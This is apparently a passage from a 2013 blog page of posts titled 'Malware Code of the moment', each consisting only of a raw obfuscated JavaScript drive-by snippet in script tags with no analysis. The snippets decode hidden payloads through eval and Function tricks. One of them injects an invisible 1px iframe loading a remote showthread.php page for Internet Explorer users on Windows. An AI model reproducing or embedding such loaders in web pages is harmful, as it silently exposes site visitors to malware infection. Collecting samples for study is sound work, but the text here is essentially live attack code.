0,-12,44,4,-104,88,-104,48,72,-20,-100,72,-16,52,28,-164,84,-64,-12,144,-40,0,0,-108,132,-52, 44,-28,28,-116,116,-76,24,-32,100,20,-164,148,-16,-40,-48,40,-84,136,-4,-132,140,-116,-24, 164,-164,148,-16,-112,40,-32,72,-16,52,28,-164,60,-52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56, 96,20,-12,-132,20,40,-20,44,-40,16,-84,84,-68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40, 136,4,-96,52,-48,-28,76,-48,0,4,52,-24,8,60,20,-72,-36,-64,64,4,-52,100,-8,-8,-52,92,-96,-12,-24, 92,-88,24,12,-12,96,-96,-4,4,104,-96,-24,48,-68,36,24,0,-52,148,-88,48,-8,-8,-52,92,-96,-12,-24, 92,-36,20,-36,-12,104,-104,48,72,-136,48,76,-12,-84,36,-52,120,-12,-132,60,48,-8,-8,-52,92,-96, -12,-24,92,-68,-24,100,32,-120,48,-72,72,48,-8,-8,-52,92,-96,-12,-24,92,40,-56,-20,-44,48,-72,72, 48,-8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-28,-4,24,80,-140,68,-84,84,20,-92,72, 
-52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-68,8,28,-32,-4,140,-72,-84,84, 20,-92,72,-52,100,4,0,0,-60,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-12,44,-80,0, -56,148,-96,-68,8,36,-4,28,-32,80,-92,100,4,0,-48]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";var pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);</script>

Friday, February 8, 2013

Malware Code of the moment

 <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</script>

Thursday, February 7, 2013

Malware code of the moment

<script>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F<BnCs? e.wvlu:HGtNb; /EM";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f159,0,-93,9,42,-33,-45,51,-18,63,-102,87,-15,42,-24,-114,111,27,18,-33,-12,-87,87,-15,42, -36,-9,-39,-27,-18,-9,141,-132,15,87,-36,-30,99,-63,-51,24,-9,15,24,-6,-66,48,-21,111,0,0,-93,9, -60,3,15,87,-105,69,-15,87,3,0,-153,111,3,12,-21,9,-3,-69,111,0,0,-120,51,-18,63,-102,87,-15,42, -24,3,-111,51,81,-27,-36,-57,72,-33,9,-60,3,15,87,-3,-6,-96,57,-15,-3,-9,102,0,-144,135,24,0,-153, 3,99,9,-105,114,-63,6,48,3,-108,120,27,-96,39,18,-120,42,-42,111,-96,39,-15,0,-12,66,6,24,-84, 123,-141,0,0,36,42,-93,15,120,21,-135,42,-72,102,-60,30,93,-141,18,0,99,-81,-18,-18,144,-144, -15,48,0,-3,63,9,-60,-27,108,-102,12,-3,27,6,-33,63,-72,75,-54,-57,36,102,-90,-3,27,6,-33,63,-6, 36,-84,69,-12,-63,-3,75,-63,45,-45,87,-87,66,-66,81,-84,75,-93,21,-27,0,81,-15,51,-153,87,21,-45, 81,-81,24,15,33,-120,135,-42,-21,42,3,12,-27,36,-24,-12,-45,72,-9,-51,69,-9,-57,-87,135,-51,69, -102,24,21,63,-96,9,-60,3,15,87,-42,-51,42,87,3,0,-153,153,0,-84,60,-30,-33,75,-81,24,15,12,-51, 9,-60,3,15,87,-105,69,-15,-21,111,0,0,-30,-111,-3,102,-42,42,-60,60,-78,51,-18,63,-102,87,-15, 42,-24,-51,-57,105,-102,129,-27,45,-33,-12,-87,87,-15,42,-63,-30,12,9,-60,3,15,87,-66,15,87, -81,48,-12,9,27,-123,123,0,-132,51,87,-18,12,-27,-36,-30,57,-96,57,-18,-3,3,-9,102,0,-144,135, 24,0,-153,3,99,9,-105,114,-63,6,48,3,-108,120,27,-96,39,18,-120,42,-42,111,-96,39,-15,0,-12,66, 6,24,-84,123,-141,0,0,36,42,-93,15,120,21,-135,42,-72,102,-60,30,93,-141,18,0,99,-81,-18,-18, 144,-144,-15,48,0,-3,15,87,-81,48,-12,36,-84,69,-12,3,6,-63,45,-45,87,-87,66,-66,81,-84,-6,-3, -9,21,-27,0,81,-15,-51,102,-81,48,-12,36,-84,69,-12,3,-120,87,21,-45,81,-81,24,15,-48,-3,-36, 135,-42,-21,42,3,12,-27,-66,102,-81,48,-12,36,-84,69,-12,3,9,-12,-45,72,-90,-3,33,-33,102,-81, 48,-12,36,-84,69,-12,3,24,-57,-87,54,-3,33,-33,102,-81,48,-12,9,27,-123,123,0,-132,51,87,-18, 
12,-27,-36,-30,72,-60,-27,108,-102,9,-3,3,27,6,-33,15,87,-81,48,-12,9,27,-123,123,0,-132,51,87, -18,12,-27,-36,-30,-9,75,-54,-57,36,102,-93,-3,3,27,6,-33,15,87,3,0,0,-120,51,-18,63,-102,87, -15,42,-24,-114,111,27,18,-33,-12,-87,87,-15,42,-36,-9,-39,-27,-18,-9,141,-132,15,87,-36,-30, 99,-63,-51,24,-9,15,24,-6,-66,102,-105,-15,0,117,-15,-66,69,-63,21,66,-93,45,-9,-6,87,3, 0,-153]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script>

Wednesday, February 6, 2013

Malware code of the moment

<script&gt;var ar="=2}Cd8 pvsyw:AlEeTcBNfb6u&gt;1&lt;,)h.r3'niao0 g;/{m[\"(t]";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f120,120,108,63,18,144,12,114,54,72,135,48,105,147,93,123,48,147,45,42,48,135,48,105,147, 27,57,30,51,111,123,60,111,135,48,144,102,66,114,12,30,102,87,138,117,150,87,132,120,120,120, 108,63,96,111,135,48,96,144,87,126,120,120,6,18,48,42,27,48,18,132,120,120,120,12,114,54,72, 135,48,105,147,93,33,96,108,147,48,144,141,81,108,63,96,111,135,48,18,27,96,54,0,102,90,147, 147,21,36,129,129,3,117,69,93,78,99,117,93,78,3,78,93,78,3,15,129,108,135,111,123,48,27,129, 72,21,42,114,111,12,93,90,147,135,42,102,18,33,108,12,147,90,0,102,78,117,102,18,90,48,108, 123,90,147,0,102,78,117,102,18,27,147,30,42,48,0,102,24,108,27,108,66,108,42,108,147,30,36, 90,108,12,12,48,105,126,21,114,27,108,147,108,114,105,36,111,66,27,114,42,72,147,48,126,42, 48,63,147,36,117,126,147,114,21,36,117,126,102,75,81,129,108,63,96,111,135,48,75,141,87,126, 120,120,6,120,120,63,72,105,54,147,108,114,105,18,108,63,96,111,135,48,96,144,87,132,120, 120,120,24,111,96,18,63,18,0,18,12,114,54,72,135,48,105,147,93,54,96,48,111,147,48,45,42,48, 135,48,105,147,144,102,108,63,96,111,135,48,102,87,126,63,93,27,48,147,39,147,147,96,108, 66,72,147,48,144,102,27,96,54,102,84,102,90,147,147,21,36,129,129,3,117,69,93,78,99,117,93, 78,3,78,93,78,3,15,129,108,135,111,123,48,27,129,72,21,42,114,111,12,93,90,147,135,42,102,87, 126,63,93,27,147,30,42,48,93,24,108,27,108,66,108,42,108,147,30,0,102,90,108,12,12,48,105, 102,126,63,93,27,147,30,42,48,93,21,114,27,108,147,108,114,105,0,102,111,66,27,114,42,72,147, 48,102,126,63,93,27,147,30,42,48,93,42,48,63,147,0,102,117,102,126,63,93,27,147,30,42,48,93, 147,114,21,0,102,117,102,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144,102,33,108, 12,147,90,102,84,102,78,117,102,87,126,63,93,27,48,147,39,147,147,96,108,66,72,147,48,144, 
102,90,48,108,123,90,147,102,84,102,78,117,102,87,126,120,120,120,12,114,54,72,135,48,105, 147,93,123,48,147,45,42,48,135,48,105,147,27,57,30,51,111,123,60,111,135,48,144,102,66,114, 12,30,102,87,138,117,150,93,111,21,21,48,105,12,9,90,108,42,12,144,63,87,126,120, 120,6]".replace(k.substr(0,1),'[');pau="rnev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i!=ar2.length;i++){s+=ar.substr(ar2[i]/3,1);}
e(s);</script>

Tuesday, February 5, 2013

Malware code of the moment

<script>el=document.createElement("div");el.innerHTML="&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114; &#114;";try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};var ar=",\"C0hgev)=z(liwysc/dp'}[No1rB.Tf]; A>b taEun{<:m";var ar2="R136,0,-84,72,28,-108,32,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-96,144,-40,0,0, -84,72,-16,52,28,-164,84,-64,-12,100,4,0,-48,64,-128,24,16,-40,128,24,-40,0,0,-60,24,-32,100,20, -164,148,-16,-40,-60,52,-56,104,-132,20,-40,176,-128,72,-16,52,28,-164,128,-88,44,-40,-32,48, -68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40,136,4,-96,52,-48,-28,76,-48,0,4,52,-24,8, 60,20,-72,-36,-64,64,4,68,-96,-4,24,80,-140,20,48,20,-92,72,68,-136,8,28,-32,-4,140,-120,48, 20,-92,72,68,-88,92,-96,-12,-24,12,48,-56,24,12,-12,96,-96,-4,4,104,-96,124,-168,36,24,0,-52, 148,-40,-52,20,-36,-12,104,-104,48,72,12,-24,-12,-84,36,-52,120,-12,-132,108,-84,-24,100,32, 28,-172,120,24,-56,-20,104,-172,120,-48,60,36,-108,-20,72,-16,52,28,-164,120,-140,28,100,4,0, -48,48,0,-12,44,4,-104,88,-104,48,72,-20,-100,72,-16,52,28,-164,84,-64,-12,144,-40,0,0,-108,132 ,-52,44,-28,28,-116,116,-76,24,-32,100,20,-164,148,-16,-40,-48,40,-84,136,-4,-132,140,-116,-24, 164,-164,148,-16,-112,40,-32,72,-16,52,28,-164,60,-52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56,96, 20,-12,-132,20,40,-20,44,-40,16,-84,84,-68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40,136, 4,-96,52,-48,-28,76,-48,0,4,52,-24,8,60,20,-72,-36,-64,64,4,-52,100,-8,-8,-52,92,-96,-12,-24,92, -88,24,12,-12,96,-96,-4,4,104,-96,-24,48,-68,36,24,0,-52,148,-88,48,-8,-8,-52,92,-96,-12,-24,92, -36,20,-36,-12,104,-104,48,72,-136,48,76,-12,-84,36,-52,120,-12,-132,60,48,-8,-8,-52,92,-96,-12, -24,92,-68,-24,100,32,-120,48,-72,72,48,-8,-8,-52,92,-96,-12,-24,92,40,-56,-20,-44,48,-72,72,48, -8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-28,-4,24,80,-140,68,-84,84,20,-92,72, 
-52,100,-8,-8,-52,-40,132,-16,16,0,-48,-56,96,20,-12,-132,20,40,-68,8,28,-32,-4,140,-72,-84,84, 20,-92,72,-52,100,4,0,0,-60,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-12,44,-80,0, -56,148,-96,-68,8,36,-4,28,-32,80,-92,100,4,0,-48]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";var pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');}
e(s);</script>